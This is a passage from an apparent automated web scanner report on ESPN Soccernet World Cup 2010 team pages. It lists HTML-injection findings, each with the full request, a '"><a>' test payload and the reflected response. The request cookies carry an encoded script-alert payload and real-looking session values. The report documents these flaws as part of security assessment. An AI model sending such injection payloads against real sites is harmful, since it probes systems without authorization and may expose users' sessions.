Last-Modified: Sat, 06 Nov 2010 23:08:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:25 GMT
Content-Length: 81826
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Honduras Football /
...[SNIP]...
<a href="/worldcup2010/team?team=215&914aa"><a>4f86e09379e=1&_slug_=honduras&914aa">
...[SNIP]...

5.75. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/2666/new-zealand

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17070"><a>7043290c14 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/2666/new-zealand17070"><a>7043290c14 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:31:01 GMT
Content-Length: 82091
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New Zealand Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=2666&_slug_=new-zealand17070"><a>7043290c14&topId=801589&linktext=Coach+delighted+with+unbeaten+run">
...[SNIP]...

5.76. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/2666/new-zealand

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb3e"><a>31ef275d77e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/2666/new-zealand?6fb3e"><a>31ef275d77e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:22:18 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:22:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN33
Cache-Expires: Sat, 06 Nov 2010 23:27:18 GMT
Content-Length: 82203
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New Zealand Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=2666&6fb3e"><a>31ef275d77e=1&_slug_=new-zealand&6fb3e">
...[SNIP]...

5.77. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/4469/ghana

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b56f"><a>36f0e92eb87 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/4469/ghana3b56f"><a>36f0e92eb87 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:10:00 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:10:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:15:00 GMT
Content-Length: 81725
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ghana Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=4469&_slug_=ghana3b56f"><a>36f0e92eb87&topId=805277&linktext=Ghana+crushed%2C+Uruguay+through">
...[SNIP]...

5.78. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/4469/ghana

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea54"><a>47a90bab802 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/4469/ghana?aea54"><a>47a90bab802=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:43 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:42 GMT
Content-Length: 81833
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ghana Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=4469&aea54"><a>47a90bab802=1&_slug_=ghana&aea54">
...[SNIP]...

5.79. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/448/england

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139f9"><a>a59e25551c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/448/england139f9"><a>a59e25551c6 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:11 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Cache-Expires: Sat, 06 Nov 2010 23:14:10 GMT
Content-Length: 80274
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>England Football /
...[SNIP]...
<a href="/worldcup2010/team?team=448&_slug_=england139f9"><a>a59e25551c6&topId=805083&linktext=FA+confirms+Capello+will+stay+on">
...[SNIP]...

5.80. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/448/england

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6170"><a>7607dfaf4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/448/england?d6170"><a>7607dfaf4a2=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:48 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN20
Cache-Expires: Sat, 06 Nov 2010 23:12:48 GMT
Content-Length: 80382
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>England Football /
...[SNIP]...
<a href="/worldcup2010/team?team=448&d6170"><a>7607dfaf4a2=1&_slug_=england&d6170">
...[SNIP]...

5.81. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/449/netherlands

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26e"><a>ecad0508930 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/449/netherlands7a26e"><a>ecad0508930 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:24:22 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:24:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Cache-Expires: Sat, 06 Nov 2010 23:29:22 GMT
Content-Length: 81781
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Netherlands Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=449&_slug_=netherlands7a26e"><a>ecad0508930&topId=808125&linktext=Andres+Iniesta+fires+Spain+to+glory">
...[SNIP]...

5.82. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/449/netherlands

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accaf"><a>fe1ec450d74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/449/netherlands?accaf"><a>fe1ec450d74=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
